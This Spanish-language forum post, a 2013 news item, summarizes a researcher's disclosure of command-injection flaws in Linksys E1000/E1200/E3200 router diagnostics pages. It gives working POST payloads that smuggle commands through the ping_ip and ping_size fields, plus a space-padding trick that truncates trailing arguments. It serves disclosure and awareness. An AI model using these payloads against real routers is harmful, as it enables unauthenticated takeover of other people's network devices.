elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Foros Generales
| |-+  Foro Libre
| | |-+  Noticias (Moderadores: wolfbcn, El_Andaluz)
| | | |-+  Inyección remota de código en routers WiFi Linksys
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Inyección remota de código en routers WiFi Linksys  (Leído 1,430 veces)
wolfbcn
Moderador
***
Desconectado Desconectado

Mensajes: 53.662



Ver Perfil WWW
Inyección remota de código en routers WiFi Linksys
« en: 6 Junio 2013, 14:42 pm »

El investigador Jason Leyrer, de Trustwave ha publicado un artículo donde analiza dos fallos de seguridad en routers WiFi de la marca Linksys de Cisco. Estas vulnerabilidades permiten la ejecución de código remoto a través de la inyección de comandos en el sistema operativo subyacente, sin necesidad de autenticación en algunos casos. Están presentes en modelos cuyo soporte ya ha acabado.

Leyrer describe una vulnerabilidad descubierta por él y otra por encontrada en otros modelos del fabricante por Michael Messner. Se trata de sendas inyecciones de comandos al sistema operativo subyacente del router a través de la interfaz de gestión, más concretamente en la página de diagnóstico.
 
Las vulnerabilidades aprovechan una falta de validación en el contenido suministrado por el usuario en los campos ping_ip y ping_size. En el primer caso, al agregar dos caracteres "&" (ampersand) tras una IP válida en codificación URL y seguidos del comando a ejecutar, se consigue la inyección de comandos. Esto se traduce en una petición POST con parámetros. Por ejemplo:
 
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=127.0.0.1%26%26reboot&ping_times=5&ping_size=32&traceroute_ip=
 
Es interpretada por el sistema como:
 
ping -t 30 -c 5 -R 66560 -s 32 -f /tmp/ping.log 127.0.0.1&&reboot &
 
Al terminar correctamente el comando ping, se ejecuta el comando inyectado, en este caso reboot, que reiniciaría el router. Los comandos inyectados con este método no pueden contener espacios, ya que no se construirán.
 

Linksys E1000
 
Esta vulnerabilidad está presente en el modelo E1000. Los modelos E1200/E3200 sí realizan validación de este campo y no están afectados.
 
De manera similar se podría explotar la inyección de comandos a través del campo ping_size. Sin embargo, el sistema añade el resto de parámetros del comando ping tras el contenido inyectado, lo que provoca que no sea valido. Por ejemplo:
 
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=127.0.0.1&ping_times=5&ping_size=32%20127.0.0.1%26%26ls%20%2Dal&traceroute_ip=
 
Se ejecuta como:
 
ping -t 30 -c 5 -R 66560 -s 32 127.0.0.1&&ls -al -f /tmp/ping.log 127.0.0.1 &
 
Lo cual no es válido. Para solucionar esto, se puede aprovechar la restricción de tamaño en los comandos del sistema. Si se adjuntan tras el comando una gran cantidad de caracteres espacio codificados, el comando se truncará, dejando fuera el resto de parámetros:
 
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=127.0.0.1&ping_times=5&ping_size=32%20127.0.0.1%26%26ls%20%2Dal%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20&traceroute_ip=
 
En el sistema:
 
ping -t 30 -c 5 -R 66560 -s 32 127.0.0.1&&ls -al
 
Utilizando estos métodos, se podría conseguir una shell remota.
 
En el caso del modelo E1000, no es necesario ningún tipo de autenticación para explotar las vulnerabilidades, ya que el servidor HTTP no la pide. En cambio, para el resto de modelos sería necesario autenticarse solo si el router no tiene su configuración de fábrica.
 
Leyrer señala que de los tres modelos vulnerables probados, sólo uno, el E1200, sigue teniendo soporte por parte del fabricante, mientras que los otros dos (E1000 y E3200) no recibirán ninguna actualización que resuelva los fallos. Para estos, recomienda desactivar la interfaz de administración, aunque esto puede no ser suficiente para evitar un ataque cross-site request forgery.
 
Más información:
 
Under The Hood: Linksys Remote Command Injection Vulnerabilities http://blog.spiderlabs.com/2013/05/under-the-hood-linksys-remote-command-injection-vulnerabilities.html
 
Multiple Vulnerabilities in Linksys E1500/E2500 http://www.s3cur1ty.de/m1adv2013-004

http://www.laflecha.net/canales/seguridad/noticias/inyeccion-remota-de-codigo-en-routers-wifi-linksys


En línea

La mayoria pedimos consejo cuando sabemos la respuesta, pero queremos que nos den otra.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Cisco impide acceder a sus routers Linksys a los usuarios no registrados en ....
Noticias
wolfbcn 3 2,595 Último mensaje 6 Julio 2012, 01:25 am
por dimitrix
2 routers Hitron CDE 30364 y Linksys
Redes
Zedmix 5 4,281 Último mensaje 11 Enero 2013, 13:13 pm
por T0rete
Ejecución remota de código en diversos routers TP-Link
Noticias
wolfbcn 0 1,593 Último mensaje 27 Marzo 2013, 17:50 pm
por wolfbcn
Ejecución remota de código en routers Netgear
Noticias
wolfbcn 0 1,134 Último mensaje 6 Junio 2017, 01:41 am
por wolfbcn
dudas sobre inyeccion remota de comando en URL (como mitigar)
GNU/Linux
rocheka 6 4,092 Último mensaje 18 Mayo 2020, 09:34 am
por @XSStringManolo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines